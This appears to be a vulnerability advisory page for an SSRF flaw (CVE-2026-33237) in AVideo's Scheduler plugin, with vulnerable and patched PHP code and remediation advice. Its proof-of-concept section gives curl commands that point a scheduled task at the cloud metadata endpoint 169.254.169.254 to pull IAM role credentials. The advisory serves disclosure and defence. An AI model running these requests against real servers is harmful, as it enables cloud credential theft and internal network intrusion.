PHP
CVE-2026-33237
MEDIUM
Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The Scheduler plugin's run() function in plugin/Scheduler/Scheduler.php calls url_get_contents() with an admin-configurable callbackURL that is validated only by isValidURL() (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through isSSRFSafeURL(), which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network callbackURL to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet.
Details
The vulnerable code is at plugin/Scheduler/Scheduler.php:157-166:
// Line 157: callback URL retrieved and site-root token substituted
$callBackURL = $e->getCallbackURL();
$callBackURL = str_replace('$SITE_ROOT_TOKEN', $global['webSiteRootURL'], $callBackURL);
if (!isValidURL($callBackURL)) {
return false;
}
// isValidURL() only checks URL format via filter_var(..., FILTER_VALIDATE_URL)
// The critical missing check is:
// if (!isSSRFSafeURL($callBackURL)) { return false; }
if (empty($_executeSchelude[$callBackURL])) {
$_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);isValidURL() in objects/functions.php uses filter_var($url, FILTER_VALIDATE_URL) - it validates URL syntax only and does not block internal/private network targets.
isSSRFSafeURL() in objects/functions.php:4021 explicitly blocks:
127.x.x.x/::1(loopback)10.x.x.x,172.16-31.x.x,192.168.x.x(RFC-1918 private)169.254.x.x(link-local, including AWS/GCP metadata at169.254.169.254)- IPv6 private ranges
This function was added to the LiveLinks proxy (GHSA-9x67-f2v7-63rw fix, commit 0e5638292) and was previously used in the aVideoEncoder download flow (GHSA-h39h-7cvg-q7j6), but the Scheduler plugin was not updated in either fix wave, leaving it as an incomplete patch.
An admin can configure the callbackURL for a scheduled task via the Scheduler plugin UI and trigger execution immediately via the "Run now" interface.
PoC
# Step 1: Authenticate as admin
# Step 2: Create a scheduled task with cloud metadata SSRF callback
curl -b "admin_session=<session>" -X POST \
https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/add.json.php \
-d "callbackURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&status=a&type=&date_to_execute=2026-03-18+12:00:00"
# Step 3: Trigger immediate execution via Scheduler run endpoint
curl -b "admin_session=<session>" \
https://target.avideo.site/plugin/Scheduler/run.php
# Step 4: Read the scheduler execution logs
curl -b "admin_session=<session>" \
https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/get.json.php
# Response includes the AWS metadata API response with IAM role credentialsExpected: Internal network addresses rejected before HTTP request is made. Actual: The server makes an HTTP request to http://169.254.169.254/latest/meta-data/iam/security-credentials/ and the response (including AWS IAM role credentials) is stored in the scheduler execution log.
Impact
- Cloud credential theft: On AWS, GCP, or Azure deployments, the attacker can retrieve IAM instance role credentials from the cloud metadata service (
169.254.169.254), potentially enabling privilege escalation within the cloud environment. - Internal service probing: The attacker can make the server issue requests to internal APIs, microservices, or databases with HTTP interfaces not exposed to the internet.
- Incomplete patch amplification: The fix for GHSA-9x67-f2v7-63rw and GHSA-h39h-7cvg-q7j6 added
isSSRFSafeURL()to specific call sites but not the Scheduler. Deployments that updated expecting comprehensive SSRF protection remain vulnerable via this path. - Blast radius: Requires admin access. Impact is significant in cloud-hosted deployments where instance metadata credentials unlock broader infrastructure access.
Recommended Fix
Add isSSRFSafeURL() validation to the Scheduler callback URL before url_get_contents() is called, consistent with the existing SSRF fixes in plugin/LiveLinks/proxy.php and objects/aVideoEncoder.json.php:
$callBackURL = $e->getCallbackURL();
if (!isValidURL($callBackURL)) {
return false;
}
// Add this SSRF check - same pattern as LiveLinks proxy fix (GHSA-9x67-f2v7-63rw):
if (!isSSRFSafeURL($callBackURL)) {
_error_log("Scheduler::run SSRF protection blocked callbackURL: " . $callBackURL);
return false;
}
if (empty($_executeSchelude[$callBackURL])) {
$_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);AnalysisAI
The AVideo Scheduler plugin fails to validate callback URLs against Server-Side Request Forgery (SSRF) protections, allowing authenticated administrators to configure scheduled tasks that make HTTP requests to internal networks, cloud metadata services, and private IP ranges. An attacker with admin access can retrieve AWS/GCP/Azure instance metadata credentials (including IAM role tokens) or probe internal APIs not exposed to the internet. A proof-of-concept exists demonstrating credential extraction from AWS metadata endpoints at 169.254.169.254.
Technical ContextAI
The vulnerability exists in the Scheduler plugin's run() function at plugin/Scheduler/Scheduler.php:157-166, where callback URLs are validated only via isValidURL() (which checks URL format using PHP's filter_var with FILTER_VALIDATE_URL flag) but are never passed through isSSRFSafeURL(). The isSSRFSafeURL() function, defined in objects/functions.php:4021 and implemented in previous SSRF fixes (GHSA-9x67-f2v7-63rw for LiveLinks proxy and GHSA-h39h-7cvg-q7j6 for aVideoEncoder), explicitly blocks requests to RFC-1918 private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), loopback addresses (127.0.0.1, ::1), link-local addresses (169.254.0.0/16 including cloud metadata), and IPv6 private ranges. The root cause (CWE-918: Server-Side Request Forgery) stems from incomplete input validation where format checking is conflated with security boundary enforcement. The affected product is WWBN AVideo (pkg:composer/wwbn_avideo), which is a PHP-based video platform where the Scheduler plugin is a core component.
RemediationAI
Apply the patch provided in the GitHub Security Advisory GHSA-v467-g7g7-hhfh (https://github.com/WWBN/AVideo/security/advisories/GHSA-v467-g7g7-hhfh), which adds isSSRFSafeURL() validation to plugin/Scheduler/Scheduler.php before the url_get_contents() call, consistent with the prior fixes in LiveLinks proxy and aVideoEncoder. The exact patch pattern recommended is: add a guard check 'if (!isSSRFSafeURL($callBackURL)) { _error_log(...); return false; }' immediately after the isValidURL() check and before url_get_contents() is invoked. Until patching, temporarily disable the Scheduler plugin or restrict admin role membership to trusted personnel only and audit existing scheduled tasks for internal IP addresses (use grep or database queries to inspect callbackURL fields in the scheduler configuration table). Implement network segmentation to block outbound HTTP/HTTPS from the AVideo server to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16) at the firewall level as a compensating control.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-v467-g7g7-hhfh